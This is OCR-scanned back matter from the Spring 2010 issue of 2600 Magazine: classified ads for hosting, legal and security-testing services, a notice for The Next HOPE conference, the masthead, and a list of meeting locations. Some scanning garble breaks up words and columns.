or order through our online store at http://store. Contact them at your peril.66GHZ processors. and just about anything else in over one million neighborhoods throughout the world . http://muentzlaw. web application security testing.twitter.com/. How about Quad 2. http://www. Admitted to practice law in Pennsylvania and New Jersey. INCARCERATED 2600 M E M B E R NEEDS C O M M U N I TY HELP to build content in free classified ad and "local business directory" in 50 countries. Links to " N o Pay Classifieds" are also greatly appreciated. www. Covers topics such as cryptography. etc. Other related links: www. brute forcing WPA). NY 11953. goods and services. P O Box 752. systems. sanity.banditdefense. 2600 readers' setup fees are always waived. and access control. P U B L I C INTELLIGENCE I N THE P U B L I C INTEREST. I live in N Y C and work as Executive Director with HOPE'S first ever speaker. P O Box 99. John Lambros. VPNs. and cryptography. JEAH also features rock-solid U N I X web hosting. remote exploits). Collect. book reviews. ORACLE DEVELOPMENT BLOG.com and add some content. Powered by http://www. Visit black-of-hat. and exploitation). and secure U N I X shell accounts.earth-intelligence. and email accounts. My services include: hacking your organization from the Internet (comprehensive information gathering and reconnaissance. Lifetime 2 6 % discount for 2600 readers. Use hundreds of IRC vhost domains and access all shell programs and compilers.net. Announcements SOCIAL O R G A N I Z A T I O N O F THE C O M P U T E R UNDERG R O U N D .2600. It will take all of five or ten minutes.kaleton. The mission is simple: "free help to billions of people locating jobs. and 25x the storage? JEAH. and explore without Big Brother looking over their shoulder. and I give priority to those facing government repression. w e reserve the right to pass judgment on your ad and not print it if it's amazingly stupid or has nothing at all to do with the hacker world. Connect. JAVA P R O G R A M M I N G B L O G . exceptions.com/offthehook or on shortwave in North and Central America at 5110 khz. Reverse.net / www. Hosted at Chicago Equinix with Juniper Filtered DoS Protection. Send your ad to 2600 Marketplace. smart-city. and constructors. 9GB of RAM.com OFFTHE HOOK is the weekly one hour hacker radio show presented Wednesday nights at 7:00 pm ET on W B A l 99. Visit enableassertions.NET is #1 for fast. Enumeration of networks. Free consultation to 2600 readers. wireless network security (slicing through WEP.all for FREE. database design. com- munity information. because w e read too! Don't forget our private domain name registration at FYNE. and strongly support freedom of speech.net. blogspot.com. com. encryption technology. Recent topics include puzzles. Your feedback on the program is always welcome at oth®2600.net.NET U N I X SHELLS & H O S T I N G .Net is owned and operated by Intelligent Hackers. and hackers is now available. HAVE A P R O B L E M W I T H THE L A W ? D O E S Y O U R LAWYER NOT U N D E R S T A N D Y O U ? Have you been charged with a computer related crime? Is someone threatening to sue you for something technology related? Do you just need a lawyer that understand IT and the hacker culture? I've published and presented at H O P E and Defcon on the law facing technology professionals and hackers alike. stable. etc.org.BrazilBoycott. Penetration testing networks and systems remotely. and local business directory in 50 global markets. Identifying software vulnerabilities specific to web based applications and web facing operating systems as well as special requests.com. righteousness. Information: contactfiR9Media.2600.com alexemuentzlaw. Be sure to include your subscriber coding (those numbers on the top of your mailing label) for verification.R9media.com. Include your address label/envelope or a photocopy so w e know you're a subscriber. a girlfriend or boyfriend.canada2600.NoFciyClassifieds.COM. Archives of all shows dating back to 1988 can be found at the 2600 site in mp3 format! Shows from 1988-2009 are now available in DVD-R high fidelity audio for only $10 a year or $150 for a lifetime subscription. Robert Steele. W e believe every user has the right to online security and privacy.blogspot. with a money back guarantee. of the people advertising here. Free PDF version. I'll hack into your computer systems and then help you fix all the security holes. Middle Island. W e support 2600.5 F M in New York City.

hope.2010 at the world famous Hotel Pennsylvania in New York City and show the world what hackers can do.hope.hope.net and entering your email address in the designated area to subscribe to the list or emailing majordomo@2600.hope.com/thenexthope " A And finally. don't you want to see what all the fuss is about? www. Now that we have more ways than ever before of staying updated. you can be a part of our massive email announcement list by either visiting www.17.net where you can participate directly and help shape The Next HOPE for your maximum enjoyment.THE MEXT HOPE Did you really think we were finished? Join us on July 16. how you can participate.net and a wiki at wiki. Details on who will be speaking.net ^ Page 64 2600 Magazine ' . what sorts of projects we're working on.com directly and entering 'subscribe next-announce' in the body of the message (no quotes) and then follow the instructions. and a whole lot more can be found at www.net. and 18. Join @thenexthope on Twitter for updated 140-character announcements and add your name to the list of attendees on Facebook by joining the event at tinyuri.hope. Special room rates are available at +1 212 PEnnsylvania 6-5000 (that's 212-736-5000 for those of you who don't do letters). We've also got a discussion board up at talk.

de 2600 (ISSN 0749-3851. Volume 27 Issue 1. NY 11780.( "Knowledge is power. and Canada . Bland Inquisitor. NY and additional POSTMASTER: Send address changes to: 2600 P. Kevin Mitnick. French. The Prophet. Mr. Power corrupts. USPS # 003-176). Study hard. Craverose. NY 11953-0099 USA (letters@2600. Spring 2010. Billsf.. r()d3nt Forum Admin: bunni3burn Inspirational Music: M'irah. Gescom Shout Outs: The Loschers. Joe630. P. Middle Island. ]avaman.S. Middle Island. P. $50 corporate (U. M e First \ the G i m m e Gimmes. Box 752. $34 per year overseas Individual issues available from 1988 on at $6.com) 2600 Office Line: +1 631 751 2600 2600 Fax Line: +1 631 474 2677 Copyright © 2010. Box 752 Middle Island. SUBSCRIPTION CORRESPONDENCE: 2600 Subscription Dept. 2600 Enterprises Inc. Eric Corley." .com.. beerbikes. funwithtsa.O. Mr. Dragorn. Yoko O n o . Kingpin.. StankDawg. is published quarterly by 2600 Enterprises Inc. Barrington Levy. NY 11953-0752. articles@2600.com. KnlghtlOrd. ^ Spring 2010 Page 65 . O S I N .$24 individual. Upsetter Telephone Historian: flyko Network Operations: ess Broadcast Coordinators: Riintz.Unknown Editor-in-Chief Emmanuel Goldstein Associate Editor Redhackt Layout and Design Skram Cover Dabu Ch'wald Office Manager Tampruf Writers: Acidus. $65 corporate Back issues available for 1984-2009 at $25 per year. be evil. postage rates paid at mailing YEARLY SUBSCRIPTIONS: U.com) 2600 Editorial Dept. lames. 2 Flowerfield..O. Atmosphere.50 each overseas LETTERS AND ARTICLE SUBMISSIONS: St. Bernie S.25 each. offices.$34 individual. NY 11953-0752 USA (subs@2600. Funds) Overseas . glutton. lames. Box 99. Silent Switchman. Paul Estev. Buckethead. koz.O. thai I R C Admins: beave. Periodical St. Freeworm. $8.S. David Ruderman. Screamer Chaotix.

6 pm Prescott: Method Coffee. Pittsburgh: Panera Bread on Blvd of the Allies near Pitt and CMU campuses. 13th New Mexico and College. Smith: Sweetbay Coffee. 7 pm California Minnesota Los Angeles: Union Station. Vital Shopping Centre. Marlborough: Solomon Pond Mall Glendale Ave.r ARGENTINA Buenos Aires: Rivadavia 2022 "La Pocilga. PERU 222 W Michigan St. 153 E 53rd St. 6 pm Nashville: l&J's Market & Cafe. 7 pm Las Vegas: Barnes & Noble Starbucks Colorado Coffee. 4150 Montana Regents Park Row #170. 6 pm Washington Seattle: Washington State Convention Center. outside porch near the entrance. 7 pm IRELAND Dublin: At the phone booths on Wicklow ^low St beside Tower Records. 1220 W New Haven Ave. viadukten above main hall. 7 pm Boulder: Wing Zone food court. 127 K St. near the Georgia payphones and the candy shop. at Atlanta: Lenox Mall food court. 2. 7 pm 6 pm Nevada Tustin: Panera Bread. 8 pm court at the Iowa State University. 5:30 pm Illinois Christchurch: Java Cafe. 7 pm Charlottesville: Panera Bread at the Barracks Road Shopping Center. 6 pm Philadelphia: 30th St Station. Virginia Arlington: (see District of Columbia) Blacksburg: Squires Student Center at Virginia Tech. Miraflores. in the lobby. 5:30 pm San Diego: Regents Pizza. near KFC. 6 pm DENMARK Aalborg: Fast Eddie's pool hall. Jordan Lane. 7120 Wyandotte St E. 6 pm CANADA Alberta Calgary: Eau Claire Market food court by the wi-fi hotspot. 1344 District shopping center (corner of Idaho St. 6 pm AUSTRIA Graz: Cafe Haltestelle on Jakominiplatz. 6 pm Mexico City: "Zocalo" Subway Station Orlando: Fashion Square Mall food court. New Brunswick Moncton: Champlain Mall food court. Oklahoma Oklahoma City: Cafe Bella. 7 pm Cleveland (Warrensville Heights): ftnera Bread. at the end Ames: Memorial Union Building food of Tarata St. Cbetumal: Food Court at La Plaza de Americas. by Burger King. South Carolina Charleston: Northwoods Mall in the hall between Sears and Chik-Fil-A. 1144 Bitfloor. 6 pm British Columbia Kamloops: Old Main Building coffee shop in front of the registrar's office on Student St. 6:30 pm Manchester: Bulls Head Pub on London Rd. 7 pm Phoenix: Unlimited Coffee. Manitoba Winnipeg: St. Main St. between Lexington & 3rd. Auckland Central. 6 pm. 5:30 pm. 7908 Ann Arbor Starbucks in The Galleria Rogers Ave. court. 5:30 pm New York New York: Citigroup Center. upstairs. 6 pm 6 pm Indianapolis: Mo'Joe Coffee House. 6 pm Chicago Ave. SOUTH AFRICA Kansas Johannesburg (Sandton City): Sandton Kansas City (Overland Kirk): Oak food court. Inside main en700 N Washington. 4103 Richmond Rd. southeast corner of S W 89th St and Penn. 7 pm Newfoundland S t John's: Memorial University Center Food Court (in front of the Dairy Queen). 6 pm Quebec Montreal: Bell Amphitheatre. Pocatello: College Market. 741 E. the Tampa: University Mall in the back of blue one). Rochester: Interlock Rocjretet 1115 E Main si pm ^ K ^ y ^ / M North Carolina Charlotte: Panera Bread Company. JAPAN Kagoshima: Amu Plaza next to the central railway station in the basement food court tFood Cube) near Doutor Toulouse: Place du Capitole by the benches near the fast food and the Capitole wall. Strandgata 14. right front near Italian food. Dayton: Marions Piazza ver. 16 bwanston Walk. 2 blocks east of east exit. Puerto Rico San Juan: Plaza Las Americas by Borders on first floor. 3100W Tilghman St. Lille: Grand-Place (Place Charles de Gaulle) in front of the Furet du Nord bookstore. 3300 S Glenstone Ave. rue de la Gauchetiere near the Dunkin Donuts in the glass paned area with tables. front bar/ raP^bpposTOTne bu^HTOn area ofP George St at Central Station. Virginia Beach: Pembroke Mall food court. Main St. 7 pm State College: in the HUB above the Sushi place on the Penn State campus. 1912 Broadway. —2600 Magazine' . Wisconsin Madison: Fair Trade Coffee House. 5:30 pm Nebraska San Jose: Outside the cafe at the MLK Omaha: Westroads Mall southern food Library at 4th and E San Fernando.com. 6 pm Texas Austin: Spider House Cafe. North Dakota Fargo: West Acres Mall food court by the Taco John's. coffeeshop. Aarhus: In the far corner of the DSB cafe in the railway station. food court. St." AUSTRALIA Melbourne: Caffeine at ReVault Bar. Place de la Republique. W Colfax Ave. inside The Elko: Micro Binary Digit. court. 6:30 pm Toronto: Free Times Cafe. (Line 2 of the "METRO" subway. NETHERLANDS Idaho Utrecht: In front of the Burger King at Boise: BSU Student Union Building. 24 Creek Rd. 8th St. trance by bank of phones. Kowloon Tong. 6 pm Spokane: The Service Station. 904 Cherokee. ftyphone: (01273) 606674. 7 pm upstairs from the main entrance. 6 pm Ohio Cincinnati: The Brew House. Ft. 604 S Wellesley St. 7 pm the beginning of the "Zocalo-Pino Hawaii Suarez" tunnel. 6 pm beside the train station. All meetings take place on the first Friday of the month. 7:30 pm Riris: Quick Restaurant. 6 pm del Distrito Federal" exit. 6:30 pm. 7 pm London: Trocadero Shopping Center (near Piccadilly Circus). inside the exit to Klarabergsting Ave. main campus. 9746. South Dakota Sioux Falls: Empire Mall. 6 pm Trondheim: Rick's Cafe in Nordregate. CHINA Hong Kong: Pacific Coffee in Festival Walk. Utrecht Central Station. 479 Alvarado Springfield: Borders Books and Music St. 7 pm Rennes: In front of the store "Blue Box" close to Place de la Republique. 6 pm FINLAND Helsinki: Fenniakortteli food court (Vuorikatu 14). 6:30 pm Sydney: I lie Crystal Palace. 6 pm on S University. "meeting point" area in the main Indiana hall. 625-9923. 7 pm Maine UNITED STATES Portland: Maine Mall by the bench at Alabama the food court door. lowest level. (in Pentagon Row on the courtyard) 7 Florida v P Gainesville: In the hack of the UniJb: M i J U I f B S W I R r Shitijiiku versity of Florida's Reitz Union food (Station. 7 pm Dallas: Wild Turkey. 418 State St. food court by HMV. Monterey: Mucky Duck. 2nd level. 6:30 pm Park Mall food court near Street SWEDEN Corner News. of Macy & Alameda. FRANCE Cannes: Palais des Festivals & des Congres la Croisette on the left side. Windsor: Sandy's. 2908 Fruth St. NORWAY Rock Island: Cool Beanz Coffee Oslo: Sentral Train Station at the House. 7 pm Leeds: The Grove Inn. Unless otherwise noted. 1201 5 Joyce St. 3860 Maryland Pkwy. N E W ZEALAND Payphones: (208) 342-9700. 9315 N Nevada (North Spokane). 7:30 pm ENGLAND Brighton: At the phone boxes by the Sealife Centre (across the road from the Palace Pier). 7 pm Tromsoe: The upper floor at Blaa Rock Evansville: Barnes and Noble cafe at 624 S Green River Rd. 9321 )W Clay Blvd (near U N C Charlotte) 6 ^ 3 0 j p $ Raleigh: Royal Bean coffee shop. behind the Dayton Mall off SR-741. TRU Campus. 6 pm Albuquerque: University of New Lakewood: Barnes and Noble in the Mexico Student Union Building (plaza Denver West Shopping Center. 7 pm Baltimore: Barnes & Noble cafe at the Huntsville: Stanlieo's Sub Villa on Inner Harbor. 3801 Hillsborough St (next to the Playmakers Sports Bar and across from Meredith College). 3180 Willow Northampton: The Yellow Sofa. Wayne: Glenbrook Mall food court in front of Sbarro's. Massachusetts Tuscaloosa: McFarland Mall food Boston: Stratton Student Center court near the front entrance. (Building W20) at MIT in the 2nd floor Arizona lounge area. (inside). Payphones: Missouri (213) 972-9519. 1047 E McMillan. 7 pm CZECH REPUBLIC Prague: Legenda pub. Copenhagen: Cafe Blasen. 115 NW 5th Ave. 118 N. 111 Albert St. 7:30 pm Norwich: Borders entrance to Chapelfield Mall. 7 pm. 8 pm ITALY Milan: Piazza Loreto in front of McDonalds. they start at 5 pm local time. College and Spadina. 7 pm Page 66- Connecticut Newington: Panera Bread on the Berlin Turnpike. 6 pm Vermont Burlington: Borders Books at Church St and Cherry St on the second floor of the cafe. 9520. At the "Departamento the food court on the 2nd floor. 2924 Walnut Grove Rd. 6 pm Pennsylvania Allentown: Panera Bread. Cafe.. Columbus: Easton Town Center at the food court across from the indoor fountain. 1505 W High St and Manchester St. Stockholm: Central Station. neanMflbourfje Central Shopping Centre. 6 pm District of Columbia Arlington: Champos Pentagon. 2nd floor. Auckland: London Bar. Sonderborg: Cafe Druen. second floor. second Wichita: Riverside Perk. Jamboree and Barranca). 4263 Union Deposit Rd. To start a meeting in your city. 100th and Dodge. 7:30 pm Houston: Ninfa's Express next to Nordstrom's in the Galleria Mall. corner of Chicago: Mercury Cafe. corner Minneapolis: Java J's coffee house. en Iowa Alcanfores 455. Louisiana SWITZERLAND New Orleans: Z'otz Coffee House Lausanne: In front of the MacDo uptown at 8210 Oak St. Sacramento: Round Table Pizza at one block south of Battlefield Mall. southeast food court near mini post office. 8991 Kingsridge Dr. BRAZIL Belo Horizonte: Pelego's Bar at Assufeng. 9924. Oregon Portland: Backspace Cafe. south side. front room across from the bar. 6 pm Arkansas Michigan Ft. send email to meetingsf2600. Lima: Barbilonia (ex Apu Bar). 7:30 pm GREECE Athens: Outside the bookstore Papasot iriou on the corner of F^tision and Stournari. 6 pm 6:30 pm Melbourne: House of Joe Coffee MEXICO House. 6 pm Auburn: The student lounge upstairs in Maryland the Foy Union Building. 14347 "lower" level lounge). 613-9704. near the payphone. 6 pm Harrisburg: Panera Bread. 1000. Hilo: Prince Kuhio Plaza food court. 2470 Walnut Hill Lane. Ontario Ottawa: World Exchange Plaza. Tennessee Memphis: Republic Coffee. Helena: Hall beside OX at Lundy San Francisco: 4 Embarcadero Plaza Center.0. Louis: ArchReactor Hacker Space.

Sign up to vote on this title
UsefulNot useful